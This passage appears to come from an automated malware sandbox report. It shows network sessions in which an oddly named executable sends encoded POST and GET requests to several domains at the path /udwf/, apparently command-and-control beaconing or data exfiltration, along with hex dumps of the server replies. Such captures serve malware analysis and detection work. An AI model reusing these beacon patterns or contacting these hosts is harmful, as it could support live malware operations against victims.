78 78 6a 54 6c 48 45 7a 73 43 58 6e 59 49 35 46 49 32 70 37 41 42 58 4e 6c 74 30 57 30 75 2b 68 32 4f 36 33 48 66 48 63 76 56 74 31 5a 49 39 75 36 63 78 73 4e 5a 33 62 42 42 69 54 7a 41 50 4c 68 47 63 55 50 53 30 51 74 75 77 36 46 59 78 6a 33 35 5a 67 57 47 57 64 33
                                                                                                                            Data Ascii: G0Yxd2Q=JiASbP8HN86R87DJeEmxCrnEyWR33s+NbrFF5KyIioymnsrmwtYPbd6+9doczsh+kd3ItmPxO8XRm+mDjR/LngckaIljpKpP7I00CQkkIMt2MURVLJ1DSmx3r0CzcLVrTyU5jMOPACI9xPTIT8fjWMn0gPs6bx+rFeES8rkNlqpSl1R8ELUR38dgxmcO5j6HOzGSw5rBLWAz+Mue1ifDBfORZPOnf/s2KVK7RArfRlsXMzJFnHguMzuyW5QtbrUgtoEcJri5iurwEkeAjv+cQNk4ESrcXdSdKMclw/KZNzJGK7hTHZ2bZtLGadQ9ZnuiqUA7wjyJPUH9JXOypRPMqnnuzokgciVqWqOftzNTSuUXiqev3v6SuMP43LMQLU3m2R92ZoRnvdyr9IVxmBUKJwjCaOCFuWF1EBULBwhaSLmdcWlHjC4iXTtnA5d+9uSA8g2EGXZggjgGH82otS5fJ8olkr4bC/c0M/30rscDc7DIxCEI4F8YiIb2PeDioSSfT8FHyMS9dGlaiyEI+fcBSAdDYNHdN1MbWqZrvId21ZoDD54laZ7iRV7k+Z01zzpmIpwiZqHSnfpIme4AFsQWkST4e9UN0r9OtNVNmopujHaDZF7SPLe8rU0ELPpduhIVCn5vm9s1LNXsOItn+ozma+0qZt/MezTfggKdPpUG89zZxxRSawZnQHJPooHEHTV7WdNURRQX7OpPVPOEgi87TYeJ9Bsu8GbYBHdtIk17UR2Pj8c18PxJYy7AfizUXUf5aRZEVv0k4MXKVGXm7hKNC6qtvZZxJr/TuMsNyl4O3SvQLr64BOwncPQ766pnUcFP0v4MyRMGacK1bYTm/2L4TmrpsL+HwSQXns8xv6mdR1M54MjAWhkUtFzXhUxWuJr5L77HuOVsUjRYVZYgByWoL2r77mfLLU5KYg+KoMYHPeq6ttkuKM8phZGKz7m0Ka5w9wT/y7nV80b5VmbpYxYNVgI7i5hanBARpkOrGampzivTWudsQB09iqGKWvMGp2CzSrcWIvGQ+bM0fTgYKeYBZLWro3bZ5x61ucX/ytDF0L8zp6TaAC5ODC6tzOciee3qBhzedVv8fHrtLuolCxOgzv3BOJOy8UVn9UwxxjTlHEzsCXnYI5FI2p7ABXNlt0W0u+h2O63HfHcvVt1ZI9u6cxsNZ3bBBiTzAPLhGcUPS0Qtuw6FYxj35ZgWGWd3


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                            47192.168.2.1049763103.120.80.11180C:\Program Files (x86)\dNAGqKTZGUAwaxVqazHCxkYGeHKBIiEYPiPMKrHtQXpznvGBaeqnolUoXkFHVbdDlBIbtsRYWxSQYDD\xIXlFDyvSnsfUSfsjsGwj.exe
                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                            Nov 10, 2023 09:30:39.818058014 CET321OUTGET /udwf/?G0Yxd2Q=EgoyY5F9PuSC7IWgflDFG7vO7ChOxNSXUZQtmoKTqYmDoJiW0KocQ9ej5sZbxdFlzd/pkXvUfPTapOCXwmOa8U5eEphhhK4tvg==&pp=dZa4 HTTP/1.1
                                                                                                                            Host: www.633922.com
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                            Connection: close
                                                                                                                            User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                                                                            Nov 10, 2023 09:30:40.146688938 CET322INHTTP/1.1 200 OK
                                                                                                                            Server: wts/1.7.0
                                                                                                                            Date: Fri, 10 Nov 2023 08:31:41 GMT
                                                                                                                            Content-Type: text/html
                                                                                                                            Transfer-Encoding: chunked
                                                                                                                            Connection: close
                                                                                                                            Vary: Accept-Encoding
                                                                                                                            ETag: "64daefaa-1a1c"
                                                                                                                            Data Raw: 31 61 32 32 0d 0a 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 36 33 33 39 32 32 2e 63 6f 6d 2d d5 fd d4 da ce f7 b2 bf ca fd c2 eb 28 77 77 77 2e 77 65 73 74 2e 63 6e 29 bd f8 d0 d0 bd bb d2 d7 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 66 69 31 32 33 2e 6f 6e 6c 69 6e 65 2c 22 20 2f 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74
                                                                                                                            Data Ascii: 1a22<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head> <title>633922.com-(www.west.cn)</title> <meta name="description" content="wifi123.online," /> <meta name="keywords" content
                                                                                                                            Nov 10, 2023 09:30:40.146724939 CET323INData Raw: 3d 22 77 69 66 69 31 32 33 2e 6f 6e 6c 69 6e 65 2c 22 20 2f 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61
                                                                                                                            Data Ascii: ="wifi123.online," /> <meta http-equiv="Content-Type" content="text/html; charset=gb2312" /> <style> body { line-height: 1.6; background-color: #fff; } body, t
                                                                                                                            Nov 10, 2023 09:30:40.146760941 CET323INData Raw: 20 20 20 63 6f 6c 6f 72 3a 20 23 36 36 36 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 2d 77 65 62 6b 69 74 2d 66 6f 6e 74 2d 73 6d 6f 6f 74 68 69 6e 67 3a 20 61 6e 74 69 61 6c 69 61 73 65 64 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 2d 6d 6f
                                                                                                                            Data Ascii: color: #666; -webkit-font-smoothing: antialiased; -moz-font-smoothing: antialiased; } html, body { height: 100%; } html, body,
                                                                                                                            Nov 10, 2023 09:30:40.146795988 CET324INData Raw: 20 20 20 20 20 20 20 20 74 64 2c 0d 0a 20 20 20 20 20 20 20 20 66 69 65 6c 64 73 65 74 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0d 0a
                                                                                                                            Data Ascii: td, fieldset { margin: 0; padding: 0; } .wrap { margin: 0px auto; min-width: 990px; max-width: 1190px } .
                                                                                                                            Nov 10, 2023 09:30:40.146828890 CET324INData Raw: 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 20 30 20 32 30 70 78 20 30 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 0d 0a 20 20 20 20 20 20 20 20 2e 6f 72 61 6e 67 65 62 74 6e 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61
                                                                                                                            Data Ascii: padding: 0 0 20px 0 } .orangebtn { background-color: #ff8400; display: inline-block; padding: 0px 20px; color: #fff; height: 50px; li
                                                                                                                            Nov 10, 2023 09:30:40.146862030 CET325INData Raw: 34 38 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 66 65 66 66 30 37 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 54 61 68 6f 6d 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0d 0a
                                                                                                                            Data Ascii: 48px; color: #feff07; font-family: Tahoma, sans-serif; padding: 60px 0 20px 0 } .banner1 p { color: #fff; font-size: 20px; }
                                                                                                                            Nov 10, 2023 09:30:40.146893978 CET326INData Raw: 31 30 30 25 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 33 32 30 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 36 70 78 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20
                                                                                                                            Data Ascii: 100%; margin-right: 320px; font-size: 16px } .domainout { padding: 50px 380px 50px 100px } .domainout p { line-height: 50px; }
                                                                                                                            Nov 10, 2023 09:30:40.146927118 CET326INData Raw: 20 20 20 20 2e 72 69 67 68 74 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 32 37 38 30 64 39 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0d 0a 20
                                                                                                                            Data Ascii: .right { background-color: #2780d9; height: 100%; width: 320px; position: absolute; right: 50px; top: 0; color: #fff; padding: 0px 20px
                                                                                                                            Nov 10, 2023 09:30:40.146960020 CET327INData Raw: 20 20 20 0d 0a 20 20 20 20 20 20 20 20 2e 69 6d 67 70 69 63 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 32 35 70 78 20 30 20 32 30 70 78 20 30 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 0d 0a 20
                                                                                                                            Data Ascii: .imgpic { padding: 25px 0 20px 0 } .contact { margin-left: 50px } .contact p { line-height: 40px } a {
                                                                                                                            Nov 10, 2023 09:30:40.146994114 CET327INData Raw: 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 36 36 36 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 0d 0a 20 20 20 20 20 20 20 20 2e 66 6f 6f 74 65 72 2d 6c 69 6e 6b 20 61 3a 68 6f 76 65 72 20 7b 0d 0a 20 20 20 20
                                                                                                                            Data Ascii: color: #666; } .footer-link a:hover { color: #ff8400; } .footer-link span { padding: 0 6px; } </style></head><body> <div clas
                                                                                                                            Nov 10, 2023 09:30:40.475420952 CET328INData Raw: 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 77 65 73 74 2e 63 6e 2f 79 6b 6a 2f 76 69 65 77 2e 61 73 70 3f 64 6f 6d 61 69 6e 3d 36 33 33 39 32 32 2e 63 6f 6d 22 20 63 6c 61 73 73 3d 22 6f 72
                                                                                                                            Data Ascii: span></span><a href="https://www.west.cn/ykj/view.asp?domain=633922.com" class="orangebtn" target="_blank">Buy it !</a></p> </div> </div> <div class="main-out "> <div class="wrap "> <div cla


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                            48192.168.2.1049764136.243.218.1880C:\Program Files (x86)\dNAGqKTZGUAwaxVqazHCxkYGeHKBIiEYPiPMKrHtQXpznvGBaeqnolUoXkFHVbdDlBIbtsRYWxSQYDD\xIXlFDyvSnsfUSfsjsGwj.exe
                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                            Nov 10, 2023 09:30:46.275325060 CET330OUTPOST /udwf/ HTTP/1.1
                                                                                                                            Host: www.sorenad.com
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                            Origin: http://www.sorenad.com
                                                                                                                            Referer: http://www.sorenad.com/udwf/
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Content-Length: 188
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: no-cache
                                                                                                                            User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                                                                            Data Raw: 47 30 59 78 64 32 51 3d 54 59 4e 35 6a 49 49 57 75 49 50 38 54 49 51 46 4e 66 7a 31 6f 50 2b 63 37 46 42 6c 34 2f 6c 43 51 52 38 54 5a 79 4e 50 4c 69 57 6b 74 75 34 5a 65 67 2f 31 43 6d 59 4e 59 34 59 6e 71 7a 51 47 77 79 54 67 68 78 66 76 66 66 72 64 4c 38 67 48 33 78 43 56 6a 75 79 44 2f 6a 57 41 33 6d 70 79 59 5a 45 71 70 66 42 30 66 6d 6c 4c 75 73 6e 4f 48 67 64 35 78 46 67 76 6f 67 6f 61 7a 34 73 75 34 43 74 70 7a 4c 31 4a 71 6c 56 31 51 67 4f 47 42 37 6c 78 70 44 65 56 53 64 4d 7a 48 50 4f 46 41 6b 4d 47 4f 63 36 56 6b 6e 36 79 38 46 47 49 66 51 3d 3d
                                                                                                                            Data Ascii: G0Yxd2Q=TYN5jIIWuIP8TIQFNfz1oP+c7FBl4/lCQR8TZyNPLiWktu4Zeg/1CmYNY4YnqzQGwyTghxfvffrdL8gH3xCVjuyD/jWA3mpyYZEqpfB0fmlLusnOHgd5xFgvogoaz4su4CtpzL1JqlV1QgOGB7lxpDeVSdMzHPOFAkMGOc6Vkn6y8FGIfQ==
                                                                                                                            Nov 10, 2023 09:30:46.581011057 CET332INHTTP/1.1 404 Not Found
                                                                                                                            Connection: close
                                                                                                                            cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                                                            pragma: no-cache
                                                                                                                            content-type: text/html
                                                                                                                            content-length: 708
                                                                                                                            date: Fri, 10 Nov 2023 08:30:46 GMT
                                                                                                                            vary: User-Agent
                                                                                                                            access-control-allow-origin: *
                                                                                                                            access-control-allow-methods: GET,POST,OPTIONS,DELETE
                                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                            Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                            49192.168.2.1049765136.243.218.1880C:\Program Files (x86)\dNAGqKTZGUAwaxVqazHCxkYGeHKBIiEYPiPMKrHtQXpznvGBaeqnolUoXkFHVbdDlBIbtsRYWxSQYDD\xIXlFDyvSnsfUSfsjsGwj.exe
                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                            Nov 10, 2023 09:30:49.108351946 CET333OUTPOST /udwf/ HTTP/1.1
                                                                                                                            Host: www.sorenad.com
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                            Origin: http://www.sorenad.com
                                                                                                                            Referer: http://www.sorenad.com/udwf/
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Content-Length: 208
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: no-cache
                                                                                                                            User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                                                                            Data Raw: 47 30 59 78 64 32 51 3d 54 59 4e 35 6a 49 49 57 75 49 50 38 63 4a 67 46 4b 2b 7a 31 39 2f 2b 66 6e 31 42 6c 6a 50 6c 47 51 52 67 54 5a 32 39 66 4c 52 69 6b 6a 76 49 5a 66 68 2f 31 42 6d 59 4e 53 59 59 75 6b 54 51 50 77 79 57 66 68 77 6a 76 66 65 50 64 4c 39 51 48 33 41 43 4b 6a 2b 79 46 30 44 57 43 35 47 70 79 59 5a 45 71 70 66 55 6a 66 6d 39 4c 70 64 58 4f 45 42 64 6d 74 31 67 73 69 41 6f 61 33 34 73 71 34 43 74 48 7a 4a 42 33 71 6a 5a 31 51 68 2b 47 42 71 6c 79 67 44 65 54 57 64 4e 42 57 61 54 2b 50 45 55 30 66 74 57 33 79 44 50 2b 39 51 71 62 59 72 38 52 55 6a 46 55 54 49 67 7a 2f 6c 74 75 42 61 51 6d 78 33 6b 3d
                                                                                                                            Data Ascii: G0Yxd2Q=TYN5jIIWuIP8cJgFK+z19/+fn1BljPlGQRgTZ29fLRikjvIZfh/1BmYNSYYukTQPwyWfhwjvfePdL9QH3ACKj+yF0DWC5GpyYZEqpfUjfm9LpdXOEBdmt1gsiAoa34sq4CtHzJB3qjZ1Qh+GBqlygDeTWdNBWaT+PEU0ftW3yDP+9QqbYr8RUjFUTIgz/ltuBaQmx3k=
                                                                                                                            Nov 10, 2023 09:30:49.420788050 CET334INHTTP/1.1 404 Not Found
                                                                                                                            Connection: close
                                                                                                                            cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                                                            pragma: no-cache
                                                                                                                            content-type: text/html
                                                                                                                            content-length: 708
                                                                                                                            date: Fri, 10 Nov 2023 08:30:49 GMT
                                                                                                                            vary: User-Agent
                                                                                                                            access-control-allow-origin: *
                                                                                                                            access-control-allow-methods: GET,POST,OPTIONS,DELETE
                                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                            Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                            5192.168.2.104971991.195.240.12380C:\Program Files (x86)\dNAGqKTZGUAwaxVqazHCxkYGeHKBIiEYPiPMKrHtQXpznvGBaeqnolUoXkFHVbdDlBIbtsRYWxSQYDD\xIXlFDyvSnsfUSfsjsGwj.exe
                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                            Nov 10, 2023 09:27:59.646814108 CET105OUTPOST /udwf/ HTTP/1.1
                                                                                                                            Host: www.bellcom.media
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                            Origin: http://www.bellcom.media
                                                                                                                            Referer: http://www.bellcom.media/udwf/
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Content-Length: 188
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: no-cache
                                                                                                                            User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                                                                            Data Raw: 47 30 59 78 64 32 51 3d 79 64 76 54 73 32 53 48 37 61 39 53 68 75 72 73 4c 72 51 48 37 4d 4f 71 77 71 46 37 66 72 42 70 6f 43 6f 30 2b 46 35 55 4b 74 45 73 44 34 59 30 45 37 7a 6a 67 35 49 51 47 39 76 36 7a 30 69 7a 72 7a 72 61 59 57 79 71 6c 2f 53 4f 30 67 48 38 4e 59 4a 58 67 62 6c 38 39 72 68 58 4c 75 4a 41 6c 4f 4d 54 51 65 46 50 63 48 32 45 52 58 35 2b 78 54 47 6d 79 45 39 4d 6b 71 44 4e 6f 6c 31 32 76 4f 6a 4d 46 66 67 6a 6c 4e 79 6b 6b 57 67 79 4d 32 59 34 45 55 4a 78 44 71 59 36 32 65 65 44 70 32 77 4e 36 6b 35 32 34 4a 53 44 56 43 4a 6c 42 67 3d 3d
                                                                                                                            Data Ascii: G0Yxd2Q=ydvTs2SH7a9ShursLrQH7MOqwqF7frBpoCo0+F5UKtEsD4Y0E7zjg5IQG9v6z0izrzraYWyql/SO0gH8NYJXgbl89rhXLuJAlOMTQeFPcH2ERX5+xTGmyE9MkqDNol12vOjMFfgjlNykkWgyM2Y4EUJxDqY62eeDp2wN6k524JSDVCJlBg==
                                                                                                                            Nov 10, 2023 09:27:59.953897953 CET105INHTTP/1.1 405 Not Allowed
                                                                                                                            date: Fri, 10 Nov 2023 08:27:59 GMT
                                                                                                                            content-type: text/html
                                                                                                                            content-length: 154
                                                                                                                            server: NginX
                                                                                                                            connection: close
                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                            Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
